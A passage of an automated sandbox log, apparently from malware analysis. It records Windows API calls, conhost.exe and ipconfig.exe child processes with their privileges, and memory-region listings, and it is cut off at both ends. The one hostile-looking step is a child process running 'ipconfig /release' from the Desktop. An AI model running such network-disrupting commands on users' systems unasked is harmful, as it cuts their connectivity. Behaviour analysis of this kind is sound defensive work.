Flags=0x0, BaseAddress=0x629d68) returned 1 [0281.307] GetEnvironmentStringsW () returned 0x629d68* [0281.307] GetProcessHeap () returned 0x620000 [0281.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xa76) returned 0x627cd8 [0281.308] FreeEnvironmentStringsA (penv="=") returned 1 [0281.308] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0291.913] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x0) returned 1 [0291.913] CloseHandle (hObject=0xa8) returned 1 [0291.913] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000000") returned 8 [0291.914] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0291.914] GetProcessHeap () returned 0x620000 [0291.914] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x627cd8) returned 1 [0291.914] GetEnvironmentStringsW () returned 0x627cd8* [0291.914] GetProcessHeap () returned 0x620000 [0291.914] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xa9c) returned 0x62c710 [0291.914] FreeEnvironmentStringsA (penv="=") returned 1 [0291.914] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0291.914] GetProcessHeap () returned 0x620000 [0291.915] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x62c710) returned 1 [0291.915] GetEnvironmentStringsW () returned 0x627cd8* [0291.915] GetProcessHeap () returned 0x620000 [0291.915] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0xa9c) returned 0x62c710 [0291.915] FreeEnvironmentStringsA (penv="=") returned 1 [0291.915] GetProcessHeap () returned 0x620000 [0291.915] RtlFreeHeap (HeapHandle=0x620000, Flags=0x0, BaseAddress=0x62b070) returned 1 [0291.915] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0291.915] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.915] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0291.916] _get_osfhandle (_FileHandle=1) returned 0x3c [0291.916] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd2f40c | out: lpMode=0xd2f40c) returned 1 [0291.916] _get_osfhandle (_FileHandle=0) returned 0x38 [0291.916] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd2f408 | out: lpMode=0xd2f408) returned 1 [0291.917] SetConsoleInputExeNameW () returned 0x1 [0291.917] GetConsoleOutputCP () returned 0x1b5 [0291.917] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd2f460 | out: lpCPInfo=0xd2f460) returned 1 [0291.917] SetThreadUILanguage (LangId=0x0) returned 0x409 [0291.917] exit (_Code=0) Thread: id = 190 os_tid = 0xa24 Process: id = "31" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x5f265000" os_pid = "0x1390" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "30" os_parent_pid = "0x1090" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2675 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2676 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2677 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2678 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2679 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2680 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2681 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2682 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2683 start_va = 0x7ff7625c0000 end_va = 0x7ff7625d0fff monitored = 0 entry_point = 0x7ff7625c16b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2684 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2685 start_va = 0xd0000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 2686 start_va = 0x7ffd4d670000 end_va = 0x7ffd4d857fff monitored = 0 entry_point = 0x7ffd4d69ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2687 start_va = 0x7ffd4e1c0000 end_va = 0x7ffd4e26cfff monitored = 0 entry_point = 0x7ffd4e1d81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2688 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2689 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2690 start_va = 0x600000 end_va = 0x6bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2691 start_va = 0x7ffd4df00000 end_va = 0x7ffd4df9cfff monitored = 0 entry_point = 0x7ffd4df078a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2692 start_va = 0x90000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 2693 start_va = 0x6c0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 2694 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2695 start_va = 0x7ffd45030000 end_va = 0x7ffd45088fff monitored = 0 entry_point = 0x7ffd4503fbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2696 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2697 start_va = 0x7ffd4dc70000 end_va = 0x7ffd4deecfff monitored = 0 entry_point = 0x7ffd4dd44970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2698 start_va = 0x7ffd4da60000 end_va = 0x7ffd4db7bfff monitored = 0 entry_point = 0x7ffd4daa02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2699 start_va = 0x7ffd4d860000 end_va = 0x7ffd4d8c9fff monitored = 0 entry_point = 0x7ffd4d896d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2700 start_va = 0x7ffd4e9d0000 end_va = 0x7ffd4eb25fff monitored = 0 entry_point = 0x7ffd4e9da8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2701 start_va = 0x7ffd4d8d0000 end_va = 0x7ffd4da55fff monitored = 0 entry_point = 0x7ffd4d91ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2702 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 2703 start_va = 0x7ffd50380000 end_va = 0x7ffd504c2fff monitored = 0 entry_point = 0x7ffd503a8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2704 start_va = 0x7ffd4e160000 end_va = 0x7ffd4e1bafff monitored = 0 entry_point = 0x7ffd4e1738b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2705 start_va = 0x7ffd4e2e0000 end_va = 0x7ffd4e31afff monitored = 0 entry_point = 0x7ffd4e2e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2706 start_va = 0x7ffd4db80000 end_va = 0x7ffd4dc40fff monitored = 0 entry_point = 0x7ffd4dba0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2707 start_va = 0x7ffd4b010000 end_va = 0x7ffd4b195fff monitored = 0 entry_point = 0x7ffd4b05d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2708 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2709 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 2710 start_va = 0x7e0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 2711 start_va = 0x7f0000 end_va = 0x977fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 2712 start_va = 0x980000 end_va = 0xb00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 2713 start_va = 0xb10000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 2714 start_va = 0x6d0000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 2715 start_va = 0x6d0000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 2716 start_va = 0x780000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 2717 start_va = 0x7ffd4eb30000 end_va = 0x7ffd5008efff monitored = 0 entry_point = 0x7ffd4ec911f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2718 start_va = 0x7ffd4cb80000 end_va = 0x7ffd4cbc2fff monitored = 0 entry_point = 0x7ffd4cb94b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2719 start_va = 0x7ffd4cce0000 end_va = 0x7ffd4d323fff monitored = 0 entry_point = 0x7ffd4cea64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2720 start_va = 0x7ffd4e480000 end_va = 0x7ffd4e526fff monitored = 0 entry_point = 0x7ffd4e4958d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2721 start_va = 0x7ffd500f0000 end_va = 0x7ffd50141fff monitored = 0 entry_point = 0x7ffd500ff530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2722 start_va = 0x7ffd4cb70000 end_va = 0x7ffd4cb7efff monitored = 0 entry_point = 0x7ffd4cb73210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2723 start_va = 0x7ffd4d5b0000 end_va = 0x7ffd4d664fff monitored = 0 entry_point = 0x7ffd4d5f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2724 start_va = 0x7ffd4cb10000 end_va = 0x7ffd4cb5afff monitored = 0 entry_point = 0x7ffd4cb135f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2725 start_va = 0x7ffd4caf0000 end_va = 0x7ffd4cb03fff monitored = 0 entry_point = 0x7ffd4caf52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2726 start_va = 0x7ffd4b470000 end_va = 0x7ffd4b505fff monitored = 0 entry_point = 0x7ffd4b495570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2727 start_va = 0x1f10000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 2728 start_va = 0x2000000 end_va = 0x2336fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2729 start_va = 0x50000 end_va = 0x51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2730 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2731 start_va = 0x710000 end_va = 0x769fff monitored = 1 entry_point = 0x7253f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 2732 start_va = 0x790000 end_va = 0x7b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 2733 start_va = 0x2340000 end_va = 0x2555fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 2734 start_va = 0x2560000 end_va = 0x2776fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 2735 start_va = 0x2780000 end_va = 0x2888fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 2736 start_va = 0x2890000 end_va = 0x2aa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 2737 start_va = 0x2ab0000 end_va = 0x2bbbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ab0000" filename = "" Region: id = 2738 start_va = 0x710000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 2739 start_va = 0x7ffd4e320000 end_va = 0x7ffd4e479fff monitored = 0 entry_point = 0x7ffd4e3638e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2740 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2741 start_va = 0x1f10000 end_va = 0x1fcbfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f10000" filename = "" Region: id = 2742 start_va = 0x1ff0000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 2743 start_va = 0x70000 end_va = 0x73fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2744 start_va = 0x7ffd4a370000 end_va = 0x7ffd4a391fff monitored = 0 entry_point = 0x7ffd4a371a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 2745 start_va = 0x7ffd4b200000 end_va = 0x7ffd4b212fff monitored = 0 entry_point = 0x7ffd4b202760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2746 start_va = 0x7ffd4c900000 end_va = 0x7ffd4c955fff monitored = 0 entry_point = 0x7ffd4c910bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2747 start_va = 0x80000 end_va = 0x86fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 2748 start_va = 0x750000 end_va = 0x750fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000750000" filename = "" Region: id = 2749 start_va = 0x760000 end_va = 0x760fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 2750 start_va = 0x770000 end_va = 0x774fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2751 start_va = 0x790000 end_va = 0x790fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 2752 start_va = 0x7a0000 end_va = 0x7a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 2753 start_va = 0x7ffd43ba0000 end_va = 0x7ffd43e13fff monitored = 0 entry_point = 0x7ffd43c10400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 2754 start_va = 0x7b0000 end_va = 0x7b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2755 start_va = 0x7c0000 end_va = 0x7c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Thread: id = 186 os_tid = 0x13f0 Thread: id = 187 os_tid = 0x4b0 Thread: id = 188 os_tid = 0x6e4 Thread: id = 189 os_tid = 0x650 Process: id = "32" image_name = "ipconfig.exe" filename = "c:\\windows\\syswow64\\ipconfig.exe" page_root = "0x241ae000" os_pid = "0xc24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "30" os_parent_pid = "0x1090" cmd_line = "ipconfig /release" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2763 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2764 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2765 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2766 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2767 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2768 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2769 start_va = 0x12a0000 end_va = 0x12aafff monitored = 1 entry_point = 0x12a5280 region_type = mapped_file name = "ipconfig.exe" filename = "\\Windows\\SysWOW64\\ipconfig.exe" (normalized: "c:\\windows\\syswow64\\ipconfig.exe") Region: id = 2770 start_va = 0x12b0000 end_va = 0x52affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012b0000" filename = "" Region: id = 2771 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2772 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2773 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2774 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2775 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 2776 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2777 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 2778 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2779 start_va = 0xf0000 end_va = 0xf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 2780 start_va = 0x100000 end_va = 0x101fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2781 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 2782 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2783 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2784 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2785 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2786 start_va = 0x510000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2787 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2788 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2789 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2790 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2791 start_va = 0x110000 end_va = 0x1cdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2792 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2793 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2794 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2795 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2796 start_va = 0x73d10000 end_va = 0x73d3efff monitored = 0 entry_point = 0x73d1bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 2797 start_va = 0x773e0000 end_va = 0x7743efff monitored = 0 entry_point = 0x773e4af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2798 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2799 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2800 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2801 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: 